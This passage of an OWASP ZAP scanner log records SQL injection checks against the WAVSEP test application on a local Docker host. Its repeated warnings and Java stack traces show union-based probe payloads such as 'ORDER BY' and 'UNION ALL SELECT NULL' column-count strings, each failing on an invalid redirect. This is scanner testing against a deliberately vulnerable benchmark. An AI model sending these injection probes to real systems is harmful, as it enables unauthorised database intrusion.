org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680857 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 7490#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 7490# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680857 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7827-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 7827-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680858 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680885 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680886 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680887 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680887 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680888 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680889 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680890 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680890 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680891 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown 